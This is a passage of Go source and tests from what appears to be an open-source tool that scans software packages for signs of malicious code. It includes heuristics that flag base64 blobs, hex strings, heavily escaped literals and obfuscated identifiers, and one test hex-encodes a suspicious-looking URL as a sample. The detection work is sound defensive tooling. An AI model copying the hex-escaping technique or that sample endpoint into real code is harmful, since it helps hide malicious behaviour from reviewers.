44 | 	if err := input.SendTo(cmd, fileCmdArgsHandler{}, workingDir); err != nil {
45 | 		return nil, fmt.Errorf("failed to prepare input: %w", err)
46 | 	}
47 | 
48 | 	fileCmdOutput, err := cmd.Output()
49 | 	if err != nil {
50 | 		return nil, fmt.Errorf("error running file command: %w", err)
51 | 	}
52 | 
53 | 	descriptionsString := strings.TrimSpace(string(fileCmdOutput))
54 | 	if descriptionsString == "" {
55 | 		// no files input, probably
56 | 		return []string{}, nil
57 | 	}
58 | 
59 | 	// command output is newline-separated list of file types,
60 | 	// with the order matching the input file list.
61 | 	return strings.Split(descriptionsString, "\n"), nil
62 | }
63 | 


--------------------------------------------------------------------------------
/internal/staticanalysis/linelengths/line_lengths.go:
--------------------------------------------------------------------------------
 1 | package linelengths
 2 | 
 3 | import (
 4 | 	"bufio"
 5 | 	"io"
 6 | 	"os"
 7 | 	"strings"
 8 | )
 9 | 
10 | /*
11 | GetLineLengths counts the number of characters on each line of a file or string,
12 | returning a slice containing the length of each line in sequence.
13 | 
14 | Lines are defined to be separated by newline ('\n') characters. If the newline
15 | character is preceded by a carriage return ('\r'), this will also be treated as
16 | part of the separator.
17 | 
18 | If filePath is not empty, the function attempts to count the lines of the file
19 | at that path, otherwise lines in sourceString are counted.
20 | 
21 | Note: there may not be much useful information to be gathered by distinguishing
22 | between line lengths when they get very long. It may be pragmatic to just report
23 | all lines above e.g. 64K as 64K long.
24 | */
25 | func GetLineLengths(filePath string, sourceString string) ([]int, error) {
26 | 	var reader *bufio.Reader
27 | 	if len(filePath) > 0 {
28 | 		file, err := os.Open(filePath)
29 | 		if err != nil {
30 | 			return nil, err
31 | 		}
32 | 		defer file.Close()
33 | 
34 | 		reader = bufio.NewReader(file)
35 | 	} else {
36 | 		reader = bufio.NewReader(strings.NewReader(sourceString))
37 | 	}
38 | 
39 | 	lengths := make([]int, 0)
40 | 	for {
41 | 		/* Normally bufio.Scanner would be more convenient to use here, however by default
42 | 		it uses a fixed maximum buffer size (MaxScanTokenSize = 64 * 1024). Since some
43 | 		(obfuscated) source code may contain very long lines, rather than doing our own
44 | 		buffer management we'll use reader.ReadStrings, which uses an internal function
45 | 		(collectFragments) to aggregate multiple full buffers. */
46 | 		line, readErr := reader.ReadString('\n')
47 | 		if readErr != nil && readErr != io.EOF {
48 | 			return nil, readErr
49 | 		}
50 | 
51 | 		// remove trailing newline and carriage return if present
52 | 		// (code adapted from bufio.ReadLine())
53 | 		l := len(line)
54 | 		if l >= 1 {
55 | 			if line[l-1] == '\n' {
56 | 				drop := 1
57 | 				if l >= 2 && line[l-2] == '\r' {
58 | 					drop = 2
59 | 				}
60 | 				l -= drop
61 | 			}
62 | 			lengths = append(lengths, l)
63 | 		}
64 | 
65 | 		if readErr == io.EOF {
66 | 			break
67 | 		}
68 | 	}
69 | 
70 | 	if len(lengths) == 0 {
71 | 		// define the empty string to have a single empty line
72 | 		lengths = append(lengths, 0)
73 | 	}
74 | 
75 | 	return lengths, nil
76 | }
77 | 


--------------------------------------------------------------------------------
/internal/staticanalysis/linelengths/line_lengths_test.go:
--------------------------------------------------------------------------------
 1 | package linelengths
 2 | 
 3 | import (
 4 | 	"reflect"
 5 | 	"testing"
 6 | )
 7 | 
 8 | func TestSourceStringLineLengths(t *testing.T) {
 9 | 	tests := []struct {
10 | 		name    string
11 | 		source  string
12 | 		want    []int
13 | 		wantErr bool
14 | 	}{
15 | 		{
16 | 			name: "test simple multiline",
17 | 			source: `
18 | One
19 | Two
20 | Three
21 | Four
22 | Five
23 | `,
24 | 			want:    []int{0, 3, 3, 5, 4, 4},
25 | 			wantErr: false,
26 | 		},
27 | 		{
28 | 			name:    "test simple single line",
29 | 			source:  `One Two Three Four Five`,
30 | 			want:    []int{23},
31 | 			wantErr: false,
32 | 		},
33 | 		{
34 | 			name:    "test empty string",
35 | 			source:  ``,
36 | 			want:    []int{0},
37 | 			wantErr: false,
38 | 		},
39 | 		{
40 | 			name:    "test single char",
41 | 			source:  "a",
42 | 			want:    []int{1},
43 | 			wantErr: false,
44 | 		},
45 | 		{
46 | 			name: "test empty newline",
47 | 			source: `
48 | `,
49 | 			want:    []int{0},
50 | 			wantErr: false,
51 | 		},
52 | 
53 | 		{
54 | 			name:    "test carriage return",
55 | 			source:  "\r\n",
56 | 			want:    []int{0},
57 | 			wantErr: false,
58 | 		},
59 | 	}
60 | 	for _, tt := range tests {
61 | 		t.Run(tt.name, func(t *testing.T) {
62 | 			got, err := GetLineLengths("", tt.source)
63 | 			if (err != nil) != tt.wantErr {
64 | 				t.Errorf("GetLineLengths() error = %v, wantErr %v", err, tt.wantErr)
65 | 				return
66 | 			}
67 | 			if !reflect.DeepEqual(got, tt.want) {
68 | 				t.Errorf("GetLineLengths() got = %v, want %v", got, tt.want)
69 | 			}
70 | 		})
71 | 	}
72 | }
73 | 


--------------------------------------------------------------------------------
/internal/staticanalysis/parsing/init_parser.go:
--------------------------------------------------------------------------------
 1 | package parsing
 2 | 
 3 | import (
 4 | 	"context"
 5 | 	_ "embed"
 6 | 	"fmt"
 7 | 	"os"
 8 | 	"os/exec"
 9 | 	"path/filepath"
10 | 
11 | 	"github.com/ossf/package-analysis/internal/utils"
12 | )
13 | 
14 | // babelParser holds the content of the parser script.
15 | //
16 | //go:embed babel-parser.js
17 | var babelParser []byte
18 | 
19 | // packageJSON holds the content of the NPM package.json file, with information
20 | // about the dependencies for the parser
21 | //
22 | //go:embed package.json
23 | var packageJSON []byte
24 | 
25 | // packageLockJSON holds the content of the NPM package-lock.json file, with
26 | // information about versions and hashes of dependencies for the parser
27 | //
28 | //go:embed package-lock.json
29 | var packageLockJSON []byte
30 | 
31 | const (
32 | 	parserFileName          = "babel-parser.js"
33 | 	packageJSONFileName     = "package.json"
34 | 	packageLockJSONFileName = "package-lock.json"
35 | )
36 | 
37 | // npmCacheDir is used to check for cached versions of NPM dependencies before
38 | // downloading them from a remote source. The directory is populated by the
39 | // Docker build for the container this code will run in.
40 | const npmCacheDir = "/npm_cache"
41 | 
42 | type ParserConfig struct {
43 | 	InstallDir string
44 | 	ParserPath string
45 | }
46 | 
47 | type parserFile struct {
48 | 	name         string
49 | 	contents     []byte
50 | 	isExecutable bool
51 | }
52 | 
53 | var parserFiles = []parserFile{
54 | 	{parserFileName, babelParser, false},
55 | 	{packageJSONFileName, packageJSON, false},
56 | 	{packageLockJSONFileName, packageLockJSON, false},
57 | }
58 | 
59 | func InitParser(ctx context.Context, installDir string) (ParserConfig, error) {
60 | 	if err := os.MkdirAll(installDir, 0o777); err != nil {
61 | 		return ParserConfig{}, fmt.Errorf("error creating JS parser directory: %w", err)
62 | 	}
63 | 
64 | 	for _, file := range parserFiles {
65 | 		writePath := filepath.Join(installDir, file.name)
66 | 		if err := utils.WriteFile(writePath, file.contents, file.isExecutable); err != nil {
67 | 			return ParserConfig{}, fmt.Errorf("error writing %s to %s: %w", file.name, installDir, err)
68 | 		}
69 | 	}
70 | 
71 | 	// run npm install in that folder
72 | 	npmArgs := []string{"ci", "--silent", "--no-progress", "--prefix", installDir}
73 | 
74 | 	fileInfo, err := os.Stat(npmCacheDir)
75 | 	cacheDirAccessible := err == nil && fileInfo.IsDir() && (fileInfo.Mode().Perm()&0o700 == 0o700)
76 | 	if cacheDirAccessible {
77 | 		npmArgs = append(npmArgs, "--cache", npmCacheDir, "--prefer-offline")
78 | 	}
79 | 
80 | 	cmd := exec.CommandContext(ctx, "npm", npmArgs...)
81 | 	if err := cmd.Run(); err != nil {
82 | 		return ParserConfig{}, fmt.Errorf("npm install error: %w", err)
83 | 	}
84 | 
85 | 	return ParserConfig{
86 | 		InstallDir: installDir,
87 | 		ParserPath: filepath.Join(installDir, parserFileName),
88 | 	}, nil
89 | }
90 | 


--------------------------------------------------------------------------------
/internal/staticanalysis/parsing/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "package-analysis-js-parsing",
 3 |   "version": "1.0.0",
 4 |   "type": "module",
 5 |   "dependencies": {
 6 |     "@babel/parser": "^7.26.5",
 7 |     "@babel/traverse": "^7.26.5"
 8 |   }
 9 | }
10 | 


--------------------------------------------------------------------------------
/internal/staticanalysis/parsing/result.go:
--------------------------------------------------------------------------------
 1 | package parsing
 2 | 
 3 | import (
 4 | 	"fmt"
 5 | 	"strings"
 6 | 
 7 | 	"github.com/ossf/package-analysis/pkg/api/staticanalysis/token"
 8 | )
 9 | 
10 | // SingleResult holds processed information about source code tokens
11 | // found in a single file by a single language parser
12 | type SingleResult struct {
13 | 	Language       Language           `json:"language"`
14 | 	Identifiers    []token.Identifier `json:"identifiers"`
15 | 	StringLiterals []token.String     `json:"string_literals"`
16 | 	IntLiterals    []token.Int        `json:"int_literals"`
17 | 	FloatLiterals  []token.Float      `json:"float_literals"`
18 | 	Comments       []token.Comment    `json:"comments"`
19 | 	// future: external function calls / references (e.g. eval)
20 | }
21 | 
22 | func (r SingleResult) String() string {
23 | 	parts := []string{
24 | 		fmt.Sprintf("language: %s", r.Language),
25 | 		fmt.Sprintf("identifiers\n%v", r.Identifiers),
26 | 		fmt.Sprintf("string literals\n%v", r.StringLiterals),
27 | 		fmt.Sprintf("integer literals\n%v", r.IntLiterals),
28 | 		fmt.Sprintf("float literals\n%v", r.FloatLiterals),
29 | 		fmt.Sprintf("comments\n%v", r.Comments),
30 | 	}
31 | 	return strings.Join(parts, "\n")
32 | }
33 | 


--------------------------------------------------------------------------------
/internal/staticanalysis/parsing/string_regexp.go:
--------------------------------------------------------------------------------
 1 | package parsing
 2 | 
 3 | import (
 4 | 	"os"
 5 | 	"regexp"
 6 | 
 7 | 	"github.com/ossf/package-analysis/internal/utils"
 8 | )
 9 | 
10 | // General reference for matching string literals
11 | // https://blog.stevenlevithan.com/archives/match-quoted-string
12 | 
13 | // https://stackoverflow.com/a/10786066
14 | var (
15 | 	singleQuotedString   = regexp.MustCompile(`'[^'\\]*(\\.[^'\\]*)*'`)
16 | 	doubleQuotedString   = regexp.MustCompile(`"[^"\\]*(\\.[^"\\]*)*"`)
17 | 	backTickQuotedString = regexp.MustCompile("`[^`\\\\]*(\\\\.[^`\\\\]*)*`")
18 | )
19 | 
20 | // https://stackoverflow.com/a/30737232
21 | var (
22 | 	singleQuotedString2   = regexp.MustCompile(`'(?:[^'\\]*(?:\\.)?)*'`)
23 | 	doubleQuotedString2   = regexp.MustCompile(`"(?:[^"\\]*(?:\\.)?)*"`)
24 | 	backTickQuotedString2 = regexp.MustCompile("`(?:[^`\\\\]*(?:\\\\.)?)*`")
25 | )
26 | 
27 | //goland:noinspection GoUnusedGlobalVariable
28 | var anyQuotedString = utils.CombineRegexp(singleQuotedString, doubleQuotedString, backTickQuotedString)
29 | 
30 | //goland:noinspection GoUnusedGlobalVariable
31 | var anyQuotedString2 = utils.CombineRegexp(singleQuotedString2, doubleQuotedString2, backTickQuotedString2)
32 | 
33 | type ExtractedStrings struct {
34 | 	RawLiterals []string
35 | 	Strings     []string
36 | }
37 | 
38 | func dequote(s string) string {
39 | 	if len(s) <= 2 {
40 | 		return ""
41 | 	} else {
42 | 		return s[1 : len(s)-1]
43 | 	}
44 | }
45 | 
46 | func FindStringsInCode(source string, stringRegexp *regexp.Regexp) (*ExtractedStrings, error) {
47 | 	allStrings := stringRegexp.FindAllString(source, -1)
48 | 	if allStrings == nil {
49 | 		return &ExtractedStrings{Strings: []string{}, RawLiterals: []string{}}, nil
50 | 	}
51 | 
52 | 	unquotedStrings := utils.Transform(allStrings, dequote)
53 | 	return &ExtractedStrings{Strings: unquotedStrings, RawLiterals: allStrings}, nil
54 | }
55 | 
56 | func FindStringsInFile(filePath string, stringRegexp *regexp.Regexp) (*ExtractedStrings, error) {
57 | 	fileBytes, err := os.ReadFile(filePath)
58 | 	if err != nil {
59 | 		return nil, err
60 | 	}
61 | 	fileString := string(fileBytes)
62 | 	return FindStringsInCode(fileString, stringRegexp)
63 | }
64 | 


--------------------------------------------------------------------------------
/internal/staticanalysis/signals/analyze.go:
--------------------------------------------------------------------------------
 1 | package signals
 2 | 
 3 | import (
 4 | 	"unicode/utf8"
 5 | 
 6 | 	"github.com/ossf/package-analysis/internal/staticanalysis/parsing"
 7 | 	"github.com/ossf/package-analysis/internal/staticanalysis/signals/detections"
 8 | 	"github.com/ossf/package-analysis/internal/utils"
 9 | 	"github.com/ossf/package-analysis/pkg/api/staticanalysis"
10 | 	"github.com/ossf/package-analysis/pkg/api/staticanalysis/token"
11 | 	"github.com/ossf/package-analysis/pkg/valuecounts"
12 | )
13 | 
14 | // countLengths returns a map containing the aggregated lengths
15 | // of each of the strings in the input list
16 | func countLengths(symbols []string) valuecounts.ValueCounts {
17 | 	lengths := make([]int, 0, len(symbols))
18 | 	for _, s := range symbols {
19 | 		lengths = append(lengths, utf8.RuneCountInString(s))
20 | 	}
21 | 
22 | 	return valuecounts.Count(lengths)
23 | }
24 | 
25 | // AnalyzeSingle collects signals of interest for a file in a package, operating on a single
26 | // parsing result (i.e. from one language parser). It returns a FileSignals object, containing
27 | // information that may be useful to determine whether the file contains malicious code.
28 | func AnalyzeSingle(parseData parsing.SingleResult) FileSignals {
29 | 	identifierNames := utils.Transform(parseData.Identifiers, func(i token.Identifier) string { return i.Name })
30 | 	stringLiterals := utils.Transform(parseData.StringLiterals, func(s token.String) string { return s.Value })
31 | 
32 | 	identifierLengths := countLengths(identifierNames)
33 | 	stringLengths := countLengths(stringLiterals)
34 | 
35 | 	signals := FileSignals{
36 | 		IdentifierLengths:     identifierLengths,
37 | 		StringLengths:         stringLengths,
38 | 		Base64Strings:         []string{},
39 | 		HexStrings:            []string{},
40 | 		EscapedStrings:        []staticanalysis.EscapedString{},
41 | 		SuspiciousIdentifiers: []staticanalysis.SuspiciousIdentifier{},
42 | 		URLs:                  []string{},
43 | 		IPAddresses:           []string{},
44 | 	}
45 | 
46 | 	for _, name := range identifierNames {
47 | 		for rule, pattern := range detections.SuspiciousIdentifierPatterns {
48 | 			if pattern.MatchString(name) {
49 | 				signals.SuspiciousIdentifiers = append(signals.SuspiciousIdentifiers, staticanalysis.SuspiciousIdentifier{name, rule})
50 | 				break // don't bother searching for multiple matching rules
51 | 			}
52 | 		}
53 | 	}
54 | 
55 | 	for _, sl := range parseData.StringLiterals {
56 | 		signals.Base64Strings = append(signals.Base64Strings, detections.FindBase64Substrings(sl.Value)...)
57 | 		signals.HexStrings = append(signals.HexStrings, detections.FindHexSubstrings(sl.Value)...)
58 | 		signals.URLs = append(signals.URLs, detections.FindURLs(sl.Value)...)
59 | 		signals.IPAddresses = append(signals.IPAddresses, detections.FindIPAddresses(sl.Value)...)
60 | 		if detections.IsHighlyEscaped(sl, 8, 0.25) {
61 | 			escapedString := staticanalysis.EscapedString{
62 | 				Value:           sl.Value,
63 | 				Raw:             sl.Raw,
64 | 				LevenshteinDist: sl.LevenshteinDist(),
65 | 			}
66 | 			signals.EscapedStrings = append(signals.EscapedStrings, escapedString)
67 | 		}
68 | 	}
69 | 
70 | 	return signals
71 | }
72 | 


--------------------------------------------------------------------------------
/internal/staticanalysis/signals/detections/base64.go:
--------------------------------------------------------------------------------
 1 | package detections
 2 | 
 3 | import (
 4 | 	"regexp"
 5 | 	"strings"
 6 | )
 7 | 
 8 | var (
 9 | 	// RFC4648 standard base 64 chars, padding optional, min length 16.
10 | 	standardBase64 = regexp.MustCompile("[[:alnum:]+/]{16,}(?:={0,2})?")
11 | 	// RFC4648 url/file-safe base 64 chars, padding optional, min length 16.
12 | 	urlSafeBase64 = regexp.MustCompile("[[:alnum:]-_]{16,}(?:={0,2})?")
13 | 	// Combines RFC4648 standard ('+', '/') + file-safe ('-', '_') base 64 variants.
14 | 	base64Regex = regexp.MustCompile(standardBase64.String() + "|" + urlSafeBase64.String())
15 | 
16 | 	filterRegexes = []*regexp.Regexp{
17 | 		regexp.MustCompile("[[:upper:]]"),
18 | 		regexp.MustCompile("[[:lower:]]"),
19 | 		regexp.MustCompile("[G-Zg-z]"), // non-hex letter
20 | 	}
21 | )
22 | 
23 | /*
24 | looksLikeActualBase64 checks a candidate base64 string (that matches base64Regex)
25 | using some rule-based heuristics to reduce false positive matching of e.g.
26 | long words, hex strings, file paths. Additionally, if the candidate string
27 | uses padding, its length is checked to ensure it is a multiple of 4 as required
28 | by the Base64 standard.
29 | */
30 | func looksLikeActualBase64(candidate string) bool {
31 | 	if strings.ContainsRune(candidate, '=') && len(candidate)%4 != 0 {
32 | 		return false
33 | 	}
34 | 
35 | 	for _, r := range filterRegexes {
36 | 		if !r.MatchString(candidate) {
37 | 			return false
38 | 		}
39 | 	}
40 | 
41 | 	return true
42 | }
43 | 
44 | /*
45 | FindBase64Substrings returns a slice containing all the non-overlapping substrings of s
46 | that are at least 20 characters long, and look like base64-encoded data. The function
47 | uses regex-based heuristics to determine valid substrings but does not decode the data.
48 | In particular, valid strings must have only valid base64 characters ([A-Za-z0-9+/] or
49 | [A-Za-z0-9-_], depending on the variant, plus up to 2 padding '=' characters).
50 | If padding characters are included, then the string length must be a multiple of 4.
51 | 
52 | The following heuristic rules are checked to reduce the number of false positives.
53 | 
54 | 1. Must have at least one uppercase letter
55 | 2. Must have at least one lowercase letter
56 | 3. Must have at least one letter outside A-F (or a-f) [this filters out hex strings]
57 | 4. If padding characters are included, the string length must be a multiple of 4
58 | 
59 | While false positive matches will occur, due to the minimum length requirement
60 | it is highly unlikely that a legitimate base64 string will be excluded from the output.
61 | 
62 | Note that, if there are multiple base64 encoded strings in the input, depending
63 | on how they are separated, they may end up being concatenated together into a single
64 | string in the returned string slice.
65 | */
66 | func FindBase64Substrings(s string) []string {
67 | 	matches := []string{}
68 | 
69 | 	for _, candidate := range base64Regex.FindAllString(s, -1) {
70 | 		if looksLikeActualBase64(candidate) {
71 | 			matches = append(matches, candidate)
72 | 		}
73 | 	}
74 | 	return matches
75 | }
76 | 


--------------------------------------------------------------------------------
/internal/staticanalysis/signals/detections/base64_test.go:
--------------------------------------------------------------------------------
 1 | package detections
 2 | 
 3 | import (
 4 | 	"reflect"
 5 | 	"testing"
 6 | )
 7 | 
 8 | const longBase64String = "IkxvcmVtIGlwc3VtIGRvbG9yIHNpdCBhbWV0LCBjb25zZWN0ZXR1ciBhZGlwaXNjaW5nIGVsaXQsIHNlZCBkby" +
 9 | 	"BlaXVzbW9kIHRlbXBvciBpbmNpZGlkdW50IHV0IGxhYm9yZSBldCBkb2xvcmUgbWFnbmEgYWxpcXVhLiBVdCBlbmltIGFkIG1pbmltIHZlb" +
10 | 	"mlhbSwgcXVpcyBub3N0cnVkIGV4ZXJjaXRhdGlvbiB1bGxhbWNvIGxhYm9yaXMgbmlzaSB1dCBhbGlxdWlwIGV4IGVhIGNvbW1vZG8gY29u" +
11 | 	"c2VxdWF0LiBEdWlzIGF1dGUgaXJ1cmUgZG9sb3IgaW4gcmVwcmVoZW5kZXJpdCBpbiB2b2x1cHRhdGUgdmVsaXQgZXNzZSBjaWxsdW0gZG9" +
12 | 	"sb3JlIGV1IGZ1Z2lhdCBudWxsYSBwYXJpYXR1ci4gRXhjZXB0ZXVyIHNpbnQgb2NjYWVjYXQgY3VwaWRhdGF0IG5vbiBwcm9pZGVudCwgc3V" +
13 | 	"udCBpbiBjdWxwYSBxdWkgb2ZmaWNpYSBkZXNlcnVudCBtb2xsaXQgYW5pbSBpZCBlc3QgbGFib3J1bS4i"
14 | 
15 | func TestFindBase64Substrings(t *testing.T) {
16 | 	tests := []struct {
17 | 		name   string
18 | 		input  string
19 | 		output []string
20 | 	}{
21 | 		{"empty", "", []string{}},
22 | 		{"16 lowercase chars", "abcdefghijklmnop", []string{}},
23 | 		{"16 uppercase chars", "ABCDEFGHIJKLMNOP", []string{}},
24 | 		{"16 digits", "1234123412341234", []string{}},
25 | 		{"16 chars lowercase hex", "0x0123456789abcd", []string{}},
26 | 		{"16 chars uppercase hex", "0XABCDEF12345678", []string{}},
27 | 		{"actual base64 no padding", "dGhpcyBpcyBhbiBvcmFuZ2UK", []string{"dGhpcyBpcyBhbiBvcmFuZ2UK"}},
28 | 		{"actual base64 1 padding", "dGhpcyBpcyBhIHBlYXI=", []string{"dGhpcyBpcyBhIHBlYXI="}},
29 | 		{"actual base64 2 padding", "dGhpcyBpcyBhbiBhcHBsZQ==", []string{"dGhpcyBpcyBhbiBhcHBsZQ=="}},
30 | 		{"actual base64 3 padding", "0XABCDEF12345678", []string{}},
31 | 		{"long base64 string", longBase64String, []string{longBase64String}},
32 | 		{
33 | 			"multiple base64 strings", longBase64String + " " + longBase64String,
34 | 			[]string{longBase64String, longBase64String},
35 | 		},
36 | 		{
37 | 			"multiple base64 strings 2", longBase64String + "!!!!====!!" + longBase64String,
38 | 			[]string{longBase64String, longBase64String},
39 | 		},
40 | 	}
41 | 	for _, tt := range tests {
42 | 		t.Run(tt.name, func(t *testing.T) {
43 | 			if got := FindBase64Substrings(tt.input); !reflect.DeepEqual(got, tt.output) {
44 | 				t.Errorf("FindBase64Substrings() = %v, want %v", got, tt.output)
45 | 			}
46 | 		})
47 | 	}
48 | }
49 | 


--------------------------------------------------------------------------------
/internal/staticanalysis/signals/detections/escape_sequences.go:
--------------------------------------------------------------------------------
 1 | package detections
 2 | 
 3 | import (
 4 | 	"regexp"
 5 | 
 6 | 	"github.com/ossf/package-analysis/pkg/api/staticanalysis/token"
 7 | )
 8 | 
 9 | /*
10 | Escape sequences are defined by the regexes below. While octal, hex and
11 | short/16-bit unicode escape sequences are mostly consistent across languages,
12 | 32-bit unicode (code point) escape sequences are more variable.
13 | v1 appears in JS, PHP, Ruby while v2 appears in Python, C, Rust, Go.
14 | */
15 | var (
16 | 	octalEscape       = regexp.MustCompile(`\\[0-7]{1,3}`)        // e.g "\077", "\251"
17 | 	hexEscape         = regexp.MustCompile(`\\x[[:xdigit:]]{2}`)  // e.g. "\x2a", "\x3f"
18 | 	unicodeEscape     = regexp.MustCompile(`\\u[[:xdigit:]]{4}`)  // e.g. "\u00af", "\u83bd"
19 | 	codePointEscapeV1 = regexp.MustCompile(`\\u\{[[:xdigit:]]+}`) // e.g. "\u{1ECC2}", \u{001FFF}"
20 | 	codePointEscapeV2 = regexp.MustCompile(`\\U[[:xdigit:]]{8}`)  // e.g. "\U0001ECC2", "\U00001FFF"
21 | 
22 | 	allEscapeSequences = []*regexp.Regexp{octalEscape, hexEscape, unicodeEscape, codePointEscapeV1, codePointEscapeV2}
23 | )
24 | 
25 | /*
26 | IsHighlyEscaped returns true if a string literal exceeds the given
27 | threshold count or frequency (in range [0, 1]) of escape sequences.
28 | 
29 | Supported escape sequences include:
30 | 
31 |  1. Octal escape: "\251",
32 |  2. Hex escape: "\x3f",
33 |  3. Unicode 16-bit escape: "\u103a",
34 |  4. Unicode 32-bit escape: "\U00100FFF" or "\u{0100FF}".
35 | */
36 | func IsHighlyEscaped(s token.String, thresholdCount int, thresholdFrequency float64) bool {
37 | 	escapeCount := 0
38 | 
39 | 	for _, escapeSequencePattern := range allEscapeSequences {
40 | 		escapeCount += len(escapeSequencePattern.FindAllStringIndex(s.Raw, -1))
41 | 	}
42 | 
43 | 	length := float64(len([]rune(s.Value))) // convert to rune slice first to count codepoints, not bytes
44 | 	return escapeCount >= thresholdCount || float64(escapeCount)/length >= thresholdFrequency
45 | }
46 | 


--------------------------------------------------------------------------------
/internal/staticanalysis/signals/detections/escape_sequences_test.go:
--------------------------------------------------------------------------------
 1 | package detections
 2 | 
 3 | import (
 4 | 	"testing"
 5 | 
 6 | 	"github.com/ossf/package-analysis/pkg/api/staticanalysis/token"
 7 | )
 8 | 
 9 | func TestIsHighlyEscaped(t *testing.T) {
10 | 	tests := []struct {
11 | 		name    string
12 | 		literal token.String
13 | 		want    bool
14 | 	}{
15 | 		{
16 | 			name:    "empty",
17 | 			literal: token.String{},
18 | 			want:    false,
19 | 		},
20 | 		{
21 | 			name: "non escaped",
22 | 			literal: token.String{
23 | 				Value: "the quick brown fox jumps over the lazy dog",
24 | 				Raw:   "the quick brown fox jumps over the lazy dog",
25 | 			},
26 | 			want: false,
27 | 		},
28 | 		{
29 | 			name: "octal with readable chars",
30 | 			literal: token.String{
31 | 				Value: "©SSTT",
32 | 				Raw:   "\"\\251\\123\\123\\124\\124\"",
33 | 			},
34 | 			want: true,
35 | 		},
36 | 		{
37 | 			name: "hex with readable chars",
38 | 			literal: token.String{
39 | 				Value: "https://js-metrics.com/minjs.php?pl=",
40 | 				Raw:   "\"\\x68\\x74\\x74\\x70\\x73\\x3A\\x2F\\x2F\\x6A\\x73\\x2D\\x6D\\x65\\x74\\x72\\x69\\x63\\x73\\x2E\\x63\\x6F\\x6D\\x2F\\x6D\\x69\\x6E\\x6A\\x73\\x2E\\x70\\x68\\x70\\x3F\\x70\\x6C\\x3D\"",
41 | 			},
42 | 			want: true,
43 | 		},
44 | 		{
45 | 			name: "16-bit unicode with non-readable chars",
46 | 			literal: token.String{
47 | 				Value: "\u09ab\u09c7\u09ac\u09cd\u09b0\u09c1",
48 | 				Raw:   "\"\\u09ab\\u09c7\\u09ac\\u09cd\\u09b0\\u09c1\"",
49 | 			},
50 | 			want: true,
51 | 		},
52 | 		{
53 | 			name: "32-bit v1 unicode with non-readable chars",
54 | 			literal: token.String{
55 | 				Value: "\u09ab\u09c7\u09ac\u09cd\u09b0\u09c1",
56 | 				Raw:   "\"\\u{09ab}\\u{09c7}\\u{09ac}\\u{09cd}\\u{09b0}\\u{09c1}\"",
57 | 			},
58 | 			want: true,
59 | 		},
60 | 		{
61 | 			name: "32-bit v2 unicode with non-readable chars",
62 | 			literal: token.String{
63 | 				Value: "\U000009ab\U000009c7\U000009ac\U000009cd\U000009b0\U000009c1",
64 | 				Raw:   "\"\\U000009ab\\U000009c7\\U000009ac\\U000009cd\\U000009b0\\U000009c1\"",
65 | 			},
66 | 			want: true,
67 | 		},
68 | 	}
69 | 	for _, tt := range tests {
70 | 		t.Run(tt.name, func(t *testing.T) {
71 | 			if got := IsHighlyEscaped(tt.literal, 8, 0.25); got != tt.want {
72 | 				t.Errorf("IsHighlyEscaped() = %v, want %v", got, tt.want)
73 | 			}
74 | 		})
75 | 	}
76 | }
77 | 


--------------------------------------------------------------------------------
/internal/staticanalysis/signals/detections/hex_strings.go:
--------------------------------------------------------------------------------
 1 | package detections
 2 | 
 3 | import (
 4 | 	"regexp"
 5 | )
 6 | 
 7 | var hexRegex = regexp.MustCompile("[[:xdigit:]]{8,}")
 8 | 
 9 | /*
10 | FindHexSubstrings returns all non-overlapping substrings of s
11 | made up of at least 8 consecutive hexadecimal digits.
12 | The leading 0x is not counted.
13 | */
14 | func FindHexSubstrings(s string) []string {
15 | 	return hexRegex.FindAllString(s, -1)
16 | }
17 | 


--------------------------------------------------------------------------------
/internal/staticanalysis/signals/detections/hex_strings_test.go:
--------------------------------------------------------------------------------
 1 | package detections
 2 | 
 3 | import (
 4 | 	"reflect"
 5 | 	"testing"
 6 | )
 7 | 
 8 | func TestFindHexSubstrings(t *testing.T) {
 9 | 	tests := []struct {
10 | 		name  string
11 | 		input string
12 | 		want  []string
13 | 	}{
14 | 		{
15 | 			name:  "empty",
16 | 			input: "",
17 | 			want:  nil,
18 | 		},
19 | 		{
20 | 			name:  "not hex",
21 | 			input: "abcdefghijklmnop",
22 | 			want:  nil,
23 | 		},
24 | 		{
25 | 			name:  "single hex",
26 | 			input: "abcdefabcdef12344",
27 | 			want:  []string{"abcdefabcdef12344"},
28 | 		},
29 | 		{
30 | 			name:  "two hex",
31 | 			input: "abcdefabcdef12344, 09acb8921308bac4",
32 | 			want:  []string{"abcdefabcdef12344", "09acb8921308bac4"},
33 | 		},
34 | 		{
35 | 			name:  "hex with prefix and non-hex suffix",
36 | 			input: "0xabcdefabcdef1234b09acb8921308bac4@02345",
37 | 			want:  []string{"abcdefabcdef1234b09acb8921308bac4"},
38 | 		},
39 | 	}
40 | 	for _, tt := range tests {
41 | 		t.Run(tt.name, func(t *testing.T) {
42 | 			if got := FindHexSubstrings(tt.input); !reflect.DeepEqual(got, tt.want) {
43 | 				t.Errorf("FindHexSubstrings() = %v, want %v", got, tt.want)
44 | 			}
45 | 		})
46 | 	}
47 | }
48 | 


--------------------------------------------------------------------------------
/internal/staticanalysis/signals/detections/suspicious_identifiers.go:
--------------------------------------------------------------------------------
 1 | package detections
 2 | 
 3 | import "regexp"
 4 | 
 5 | var (
 6 | 	hexIdentifier        = regexp.MustCompile("_0x[[:xdigit:]]{3,}")
 7 | 	numericIdentifier    = regexp.MustCompile("^[A-Za-z_]\\d{3,}")
 8 | 	singleCharIdentifier = regexp.MustCompile("^[A-Za-z_]$")
 9 | )
10 | 
11 | /*
12 | SuspiciousIdentifierPatterns is a list of regex patterns to match source code
13 | identifiers that are carry a suspicion of being obfuscated, due to being not
14 | very human-friendly. A few matching identifiers may not indicate obfuscation,
15 | but if there is a large number of suspicious identifiers (especially of the
16 | same type) then obfuscation is probable.
17 | */
18 | var SuspiciousIdentifierPatterns = map[string]*regexp.Regexp{
19 | 	"hex":     hexIdentifier,
20 | 	"numeric": numericIdentifier,
21 | 	"single":  singleCharIdentifier,
22 | }
23 | 


--------------------------------------------------------------------------------
/internal/staticanalysis/signals/file_signals.go:
--------------------------------------------------------------------------------
 1 | package signals
 2 | 
 3 | import (
 4 | 	"fmt"
 5 | 	"strings"
 6 | 
 7 | 	"github.com/ossf/package-analysis/pkg/api/staticanalysis"
 8 | 	"github.com/ossf/package-analysis/pkg/valuecounts"
 9 | )
10 | 
11 | // FileSignals holds information related to the presence of obfuscated code in a single file.
12 | type FileSignals struct {
13 | 	// The following two variables respectively record how many string literals
14 | 	// and identifiers in the file have a given length. The absence of a count
15 | 	// for a particular lengths means that there were no symbols of that length
16 | 	// in the file.
